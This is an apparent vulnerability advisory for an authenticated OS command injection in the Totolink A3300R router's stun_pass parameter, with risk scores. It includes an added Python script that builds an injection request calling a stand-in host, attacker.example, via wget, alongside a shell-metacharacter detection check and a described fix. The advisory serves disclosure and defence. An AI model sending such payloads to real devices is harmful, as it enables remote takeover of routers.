Totolink A3300R OS Command Injection Vulnerability

Vulnerability

An OS command injection vulnerability has been identified in the Totolink A3300R router, firmware version 17.0.0cu.557_B20221024. The flaw lies in the function vsetTr069Cfg, reached through the CGI endpoint /cgi-bin/cstecgi.cgi. The stun_pass parameter is taken from the request and incorporated into a command string without sanitization before that string is handed to a command execution function, so shell metacharacters in the value terminate the intended command and start a new one. An authenticated attacker can use this to inject and execute arbitrary operating system commands on the device.

Impact

Successful exploitation gives an authenticated attacker arbitrary command execution on the router, with the privileges of the process that serves /cgi-bin/cstecgi.cgi. A valid session is required, so the practical impact depends on how easily credentials can be obtained, for example default or weak administrator passwords or another flaw that yields a session.

Reproduction

To reproduce this vulnerability, authenticate to the router's web interface and send a POST request to /cgi-bin/cstecgi.cgi whose body selects the Tr069 configuration handler and includes the stun_pass parameter. Craft the stun_pass value so that it closes the command the CGI builds around it and appends a command of your own, for example a wget request to a host you control. When the request is processed, the injected command runs on the device's operating system; an inbound connection at the attacker host from the router confirms execution without needing to read command output.
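The following Python is an added example, not code from the page or from the vendor, that assembles the request the reproduction step describes and adds the check a defender would apply to it. The page gives the endpoint and the parameter name but not the request envelope; the JSON body with a "topicurl" handler selector, the value "setTr069Cfg", the SESSION_ID cookie name, the router address and attacker.example are all assumptions. The request is built as bytes and never sent, so the script runs offline.

```python
import json
import re

# Endpoint from the advisory. The handler selector and its value are
# assumptions: Totolink's CGI usually dispatches on a JSON "topicurl"
# field, and "setTr069Cfg" is assumed to reach vsetTr069Cfg.
CGI_PATH = "/cgi-bin/cstecgi.cgi"
TOPIC = "setTr069Cfg"

# Characters that let a value break out of a shell command string.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\r]")


def injection_payload(cmd):
    """Close the command built around stun_pass and append our own.
    The leading 'x' stands in for a plausible password value."""
    return f"x;{cmd};"


def build_body(stun_pass, topic=TOPIC):
    """JSON request body carrying the attacker-controlled stun_pass."""
    return json.dumps({"topicurl": topic, "stun_pass": stun_pass})


def build_request(host, body, session_cookie):
    """Raw HTTP/1.1 request bytes for the CGI. The cookie name is an
    assumption; an authenticated session is required by the advisory."""
    head = (
        f"POST {CGI_PATH} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: SESSION_ID={session_cookie}\r\n"
        "Content-Type: application/json\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return (head + body).encode()


def is_suspicious_stun_pass(body):
    """Detection/validation check: a STUN password never needs shell
    metacharacters, so their presence in stun_pass is a strong signal.
    Returns (flagged, offending_characters)."""
    try:
        data = json.loads(body)
    except ValueError:
        return False, ""
    value = str(data.get("stun_pass", ""))
    found = "".join(sorted(set(SHELL_META.findall(value))))
    return bool(found), found


if __name__ == "__main__":
    # Constructed callback: the router fetching this URL proves execution.
    payload = injection_payload("wget http://attacker.example/x -O /tmp/x")
    body = build_body(payload)
    print(build_request("192.168.0.1", body, "deadbeef").decode())
    print("flagged:", is_suspicious_stun_pass(body))
    print("benign :", is_suspicious_stun_pass(build_body("plainpass123")))
```

The same is_suspicious_stun_pass logic, applied on the device side before the value reaches the command builder (or better, replaced by passing the value as a separate argv element with no shell at all), is the fix; applied in front of the router as a WAF or IDS rule it is the detection.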

Added: Apr 6, 2026, 8:21 PM
Updated: Apr 6, 2026, 8:21 PM

Vulnerability Rating

Custom Algorithm (score per category, 0 to 10)

spread:         4.5
impact:         7.5
exploitability: 9.1
remediation:    7.7
relevance:      5.4
threat:         6.4
urgency:        2.9
incentive:      8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.